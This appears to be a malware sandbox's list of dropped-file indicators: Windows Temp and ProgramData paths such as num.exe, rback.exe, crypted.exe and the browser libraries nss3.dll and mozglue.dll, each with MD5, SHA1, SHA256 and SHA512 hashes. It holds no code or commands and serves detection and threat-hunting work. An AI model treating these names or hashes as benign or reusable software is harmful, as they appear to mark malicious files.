C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 2c8bbcdea1627a7c09968892d07369d5
SHA1 97aba52795cf717393bfa83378f5cb5fa1a3f1af
SHA256 888b4a4bf9940e35bc1e81141ac3299310360df6226e44c9820a727287c51a0e
SHA512 2461a348734a7ff01bfa6cf47cfe9ec84dd797203848da20d5a68a19d8cacb209258255f84ea655f4981d899f267ea889c6331c44ccc8f7180288ef570b97d4a

C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe

MD5 73214b61d913e098930ef28e89210e34
SHA1 a339eba656489add9125f86e3372c5edd1f075e8
SHA256 a40e7a4da80cd76d9279d0498a1d193af2227e7761a3da9437dc9d29eafc046d
SHA512 d99df1d1b49e74b1514a285f2db237d36b5c38f1bdfde3919743fbd70193439eb614de8de372783514306fbefd518ad6ce0cab68600f5ad8eb13a579935b9cee

C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe

MD5 1d277ad05dbd35ec0a8c1ac4fb8d04e6
SHA1 6803a74b2cf6e7f66a0c9dfd7e2df944955fa458
SHA256 b830aa670c60044f1906e69d93ba71cd3eae33fe45dd3fa00a9a383a8b78f0d6
SHA512 d2c239292a18a51371ad3fe8bdab28926acb36b5b4f918debd6e4a5a54b91ab020abef43c3635007a7b9494918da87bbe5d2b615faacc620e23a207319402786

C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe

MD5 37597aa8c9208d22266ad875c9bd2ca7
SHA1 a18b220e7aae446e6fc2c722bfe175ab06f30e19
SHA256 af1f49eb95b80f5de05b6a809fc525400a179db285a67ebbde4a141093153784
SHA512 e1540d3f194f253acb222e5eb18d5c9927e608bc29b0b1684e496ebd019c35a33839def85fcd1d4f86bb5225c67adc46a8029e2c16421c9cebabe736be656226

C:\ProgramData\mozglue.dll

MD5 b8916f445195adf0ccd5396d55a4e005
SHA1 5ca47e0ed1a8ae5e39baa4565fa8fe50d6b7251a
SHA256 e3710bfe6fbebcc17d70424f3e6ab5684a5b2856382fecb3a5a6690a9f33039f
SHA512 002014a5b1e2fbd0076782df2125be42d41eb0a1d8241ccfbbd7a0819d0205813053aedfa60854f8d90553bc098e6fb0d88a6e8b32859ba87243fbc9411f44bc

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\ProgramData\nss3.dll

MD5 106dd20064301144d33f28ea70c984f4
SHA1 671eb0a7a9b7015a11d7b2f8ecf2f801cb72c60c
SHA256 93109ce00dcf0d16c1d6410c3917f452cab8b34a050a845d27bc3979eecca5f5
SHA512 a58d26456aebe969445c50925cc7addfb3859bb1279ec6a281fc8af43fff0d5839ad02139c4839af064c1cf80a74e7faa082bdd197427e8854d636db211065fa

C:\ProgramData\mozglue.dll

MD5 83e82ec0b855cd1feaf2d5bd46f6131e
SHA1 c8133b9950498ea25c4bc61ed52183cb662ca20e
SHA256 6e629ad752d0c9ddf6e1b621071743605793ee8a80f3211757ae8538c1e0ffa4
SHA512 08841bc1467c0895d7b1b2ac853ce936acb3c9e7bdd9ef8c888ebcca6ede3cd6379cb2b43e896f6fcadf30630cb5559b5a8c9032c0e08be20f3712e760b5a793

C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe

MD5 d0ea15fc900551a0ee81ed10b4154e81
SHA1 c5c66449680942cfc28a9a0d7470e523093b5368
SHA256 0a05e6143b6c5dcf78ac011492f8ec886ce983a10d3272172f48fe350a094510
SHA512 921c012a16dcdfba34bd817bdd236586460c8adc5b77b227ba8eabea17b8a5ac636206861a1dfc690b1cae375300652201f0fe5e4b436b20c7f877b957322a44

C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe

MD5 b60b9b9d029fbc1a85180ce24ad7e405
SHA1 16acf3c94d0ca28a1a239e2fb02a9064ddb0cb7a
SHA256 c4e648df066a7b7e53faae44ebd416fd0827aa0081f172511a6ae6fd7b535174
SHA512 f79b87f2a162c3806c62fff030ec62f95494216d2943326c1402f4b15e13f1ef096dca71c3c949d3cdfe93eb81368cf3c7b52d91c1f07069e653b0a1edb2e1b3

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 4b3a5b96f9eedd8626a8c12976765b56
SHA1 85307e380d233c8229f9e0de16ed82821221a0be
SHA256 1651b6ed815b2128c2362ad38a7cfcdafc6c5f8705572626c872ad788c41f6ef
SHA512 b274c74ebf059fa203408a120a2c6f54f769d93d34d916aad9b4f712455b3ffe396e325744d2488a090dafb1c4621f83428719c8fe20d93b10904953dcdc8790

C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe

MD5 e2b7e0f137c27cc622cbac4aaccf177a
SHA1 0e220f2c376643908840187bea4c5d5ac273e116
SHA256 9724d26d9eff9bd1cd3eb7bb10e283c2b47cdd7991eb3683f05e4df9cfe7423e
SHA512 e0d95615d548162156492bbf229cd3052cbc37e5b17052f44b948c974ac9883d6c151b576b67de486ae514ec9c5fa6bae9c499c0d1c26f334dc22e52477d7b2b

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 7cb2a33929bcf5bceecfa35f76d39082
SHA1 810576aad287ca3ab03ce6c1e04e40fa2053773d
SHA256 7f14840b37e1c1adde6b5f1f4f0ab78e3e81cba44b818dcc0b174e275896a132
SHA512 0a6eff6c34087877c2eaa9e42776838267e346b58e6eeff2871b7d24b64f766596131121b3b3ef126427fdd90fdc2bc991629439760a5869f4baf77362809b82

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 16ca0bc7585cf1e4c8c5c34b6f951d3b
SHA1 ffecf71a91f425f096a8fac9da43ffa3d3c0c014
SHA256 3144be5415398f4405652df7d6720291cdec7edd100df47cbe49835699f141f6
SHA512 7c5a0cf83b243a5e9f46a5957d941bf63ed862f0f72f91528acfc5355b66595348f2a258247f51a027a7448edc9230feca2f038ecf7cc6dc0ad4e344988283b5

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 15214aea50a7dee7b6185ebb47cfa02d
SHA1 8f058b905075fb8f56c600a4a1ae7292ac8c084b
SHA256 f61a1a6a40231469e8d583142499bdf6d8e1afd789d6b6210a094017b39b81a2
SHA512 d15312b203cb0c340ab05df82cc04994558cf2db474633341cdcfc7aa0526a905de020316025da7a076c286baa7b048bb2dfddfa85d47a4249e91ae70e1b7663

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 cd97e76fbcd1772e560bba64a9a88328
SHA1 0cf63dd47f641d3677c1ec5b6b3170a053b0a317
SHA256 a3c033b0ce6b7c83bcbf67217c69c784989a5f86762590381b252d0bdb11595f
SHA512 462e5695543feb735967b56725edc22ee146413caa40738bb6a1ddc50cd0eede129446d90d9ad172d3fb9df49a04f3f1c955ba5ede94e75d5fac6aba14247237

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 3358165ad5c35097c5e1e9c37dc399c2
SHA1 e3a5586505ee4a9d538dacc33c28212289b9452c
SHA256 768a1a8302a1446d38920b7fe7256a4d3856c95f2205862e4cdee16d3b2d0ee3
SHA512 1104e734e6733270ab5798bce7b9406cd5832d5d08f681902973530fe3908926b89bb9db4035ea89d230ac3534bbeb2363ee1a1fc6562f78f8f70cef66153d8f

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 1fc06478fd2cc9d5c0cef0857cfeaf2f
SHA1 92dc8241b0f1f27e0377e69ed8ecdf385b2c4d6c
SHA256 318216247c723b8fe6b0878987f939ab2e3a661fa6e71a52ea175411413a757d
SHA512 7b37fcb721dc3cf7a45204624f334860f7ee0d8d3ef6752b1390e09861c3558bd4efd2b5addb255ffcd53ec6652626cfb5dad07f28520a6a1988fea4023e89fb

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 02da322d2fe9e0df40c62516b4a98bd0
SHA1 fa97f1c362b47cc97e57194a9a75c4c6d4153b8e
SHA256 1fa81bbdde339a3bffb0db18bec6c8fda808ccaba522721554365662eb020a5f
SHA512 0e4513d4e8ec7ef40b7ad29e1ed2b5ceb27652c124e10ecf7c996b4c5498fe3ec9d91d01a091d48344edaba66754d16395392bba462f130638bf734705d207c2

C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe

MD5 b93bf1838e0b44908b1c1a58777efb90
SHA1 385d3b361e4ca010f630e2307dd79673b831507c
SHA256 84f50dc193d9f169a1b9a86c22107bad6d04ae3096e3c04c28933bd610d73083
SHA512 9888daf013c9d50ac448d1082d08a0e798bc90e239e5e1f02552ceb2837f76189fa37668169444eba50d326b2beb2521aa3718a0a246fa1aab9f6ba5d381efd0

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_8.zip

MD5 aaa97cae61f10770ab65892fb10b827d
SHA1 0f5f5b27b4603a2a9a6d778263ca402d22fc964f
SHA256 96767258e636d6cd1334d3ca67a1d9f483a090a78d9bafbd3a7bc8837ec998c3
SHA512 dde8270e6699050ce428bfb442d95089b97ad2c351efe9d5d9898a4cd0ded3f5e88f22572a6aecb72a0250b4f3f76ddf933f9853f5761d5676719c886d15d295

C:\ProgramData\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_9.zip

MD5 8d857afd113f8e64a832b278b9604bd1
SHA1 2f607fc29f7c09ae609b443cb65670050b9c39f8
SHA256 235b77b3053e7bd736d1c21f1f9d2613c788994e1d7d4ae485356641bc526f6a
SHA512 a4c932de8e4a7f28dd889c079231ed69d48d179c0372c3f0925903c0d6c7cdfba313284b057f5d25e55fdaf36cc6210a00f13598eb2cadbf375da83896982fae

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 29aa7fc9d902766b1075687887f60723
SHA1 f5bf65b12678fa6a58534fd47e21254c3670d790
SHA256 052288712592e8582d37c5010dc13c343a2ead03cb3c65befb9325f57d4e7eb8
SHA512 9097c56f3f00d32df22057b8bbd2ef6cbabcadd1721d51ed85991529e6b39a39afa32317729230aca8e5c5bbb6847b8578f517f47e326ad0fa2fbd6839f70b25

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 0d1483bbb90b69c55346ec23c96c6938
SHA1 f92ab72a18ca9c499f0a395bed2d67a68f5c2105
SHA256 7b447c28d899f1051f5307c38269110a3a08dedd4fb501fc946a168b619ce175
SHA512 d01f7722b37dc9e6972128d315fbf39e3e08510c6e493e18c312943959a85eebf68d24488ce3f2210623c78a2a2bd57ef1ae51bbc624bbf8742017ef09afb9dc

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 0f7a3aae5699388c187be3676d512e46
SHA1 b656fbe7c66e54f087f1de59c29272bab6dd23c8
SHA256 d549b30fee766442ddd9a1183e8f2138aeeda4a07327f82fb7c428e835a41dcd
SHA512 066d688fb3caf8b57c0c05d0b33be0836657e64a20fdf02fe6d1f77ebc7433f1bf97d3b6adcc77dd6042c173d8bd3db1967b4bb157c938ad545c91bfffa38758

C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe

MD5 fdf2afc3a93ffe6b5e19258ddecffe18
SHA1 796c91413df92bc144e3a9a0ca737e459cf4b9d2
SHA256 eaa2c2c9da8144e6fa976c45f087bcfaa45bdbe63811810dcce6c99d580f0489
SHA512 ea82b7b571367ca10edcdec79fc9cc52e85db4ccc5ce3217182c6c1510db42e805fda0db84a6853ce8b8c483332b42cfbe0011b55b37d5c6b49ca8ce677c449b

C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe

MD5 c92705e6a009b8a4fd627b3c3b0853e9
SHA1 ce1f490cdca4d3db46f9b0001d89e140952c2cfa
SHA256 cf11cbd40c628719b70450784c2beaca71b04efc051154b138325b3dbf197cd3
SHA512 9cf7b30d8fb308b99dcb91341a05efb9db3ff4eecc708c6a0bbbbb715ed54f2d6a8c1630826c14676a6c0e66ee719b5a87d04fc8b620708bed53e9ec0e42fecd

C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe

MD5 c98b4f3e5cc2fce9d69c28ef8d33e7bf
SHA1 c5761bb1ead153ec9ea9ce1ffdf4aff015211dff
SHA256 c38f9a19c8b92b7fcc23f7308051033ee3ebed11be130072ba312900ce61baf9
SHA512 250a4731e06553994481f0b53470cde132bb8795cdc835bd035dea7b5b8163d9e04f74d9ad023fc215a0e450add94182690bd37e78395a2c2a010958cb726c8d